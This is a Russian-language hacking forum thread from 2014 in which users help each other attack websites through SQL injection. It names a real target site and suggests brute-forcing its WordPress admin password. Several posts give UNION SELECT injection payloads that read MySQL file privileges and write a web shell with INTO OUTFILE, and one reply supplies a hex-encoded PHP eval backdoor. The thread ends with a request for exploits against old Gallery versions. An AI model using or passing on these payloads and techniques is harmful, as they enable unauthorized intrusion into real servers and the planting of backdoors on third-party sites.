 |
|
17.08.2014, 23:25
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Satd
Привет. Нашел сайт может не я один наверное)) у него есть sql уязвимость через который доступна логин пасс админа. Но под админом не могу залить шелл подскажите как быть. вот оно http://www.planetsmag.com/index.php?issueid=63 .
там ворд пресс есть, брутишь пасс и заливаешся
|
|
|
18.08.2014, 00:43
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8463205
Репутация:
0
|
|
А можно разжевать для меня немного))
|
|
|
|
18.08.2014, 09:13
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Satd
А можно разжевать для меня немного))
1. Вам нужна таблица wp_users.
2. Способы заливки.
|
|
|
|
19.08.2014, 15:51
|
|
Флудер
Регистрация: 02.04.2011
Сообщений: 2,531
С нами:
7954166
Репутация:
99
|
|
чем можно просканировать сайты на sql инъекции ?
знаю что можно проверять эти уязвимости и получать данные через havij, а как сайты проверять на наличие уязвимостей ? есть ли програмки ?
havij не может сканировать домены на наличие дырок sql ?
|
|
|
|
19.08.2014, 16:26
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от GAiN
чем можно просканировать сайты на sql инъекции ?
знаю что можно проверять эти уязвимости и получать данные через havij, а как сайты проверять на наличие уязвимостей ? есть ли програмки ?
havij не может сканировать домены на наличие дырок sql ?
Различного уровня сканеров полно в интернете.
Белов делал небольшую подборку на хабре: http://habrahabr.ru/post/125317/
|
|
|
|
19.08.2014, 18:28
|
|
Новичок
Регистрация: 07.06.2013
Сообщений: 0
С нами:
6806486
Репутация:
0
|
|
Нужна помощь.
Нашёл sql, пытаюсь залить шелл, проверяю file_priv и выскакивает ошибка. Не могу разобраться, что делаю не так.
Код:
id=-31+union+select+1,2,3,4,file_priv,6,7,8,9,10,11,12,13+from+mysql.user--
Ошибка такая:
Код:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1
|
|
|
|
19.08.2014, 19:40
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Wcfs, ты перевести текст неможешь? у тебя синактичесткая ошибка при запросе, скорее всего ковычки фильтруются
|
|
|
|
20.08.2014, 13:35
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Привет!
Делаю запрос
Сообщение от None
site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'
На что выдает Y Unknown column 'id' in 'where clause'
Далее пытаюсь залить шелл
Сообщение от None
site.ru/index.php?id=-14+union+select+'',2+from+mysql.user+into+outfile+ '/tmp/s.php'
На что выдает You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка? |
|
|
|
20.08.2014, 15:18
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Evil_Genius
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?
сам шелл нужно хексить
Сообщение от None
site.ru/index.php?id=-14+union+select+0x3c3f706870206576616c28245f524551 554553545b636d645d293b203f3e,2+from+mysql.user+int o+outfile+'/tmp/s.php'
|
|
|
|
21.08.2014, 04:25
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Подскажите, где в паблике найти уязвимости/эксплоиты старых версий galleryproject.org (интересуют версии 2.2 и 2.1)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
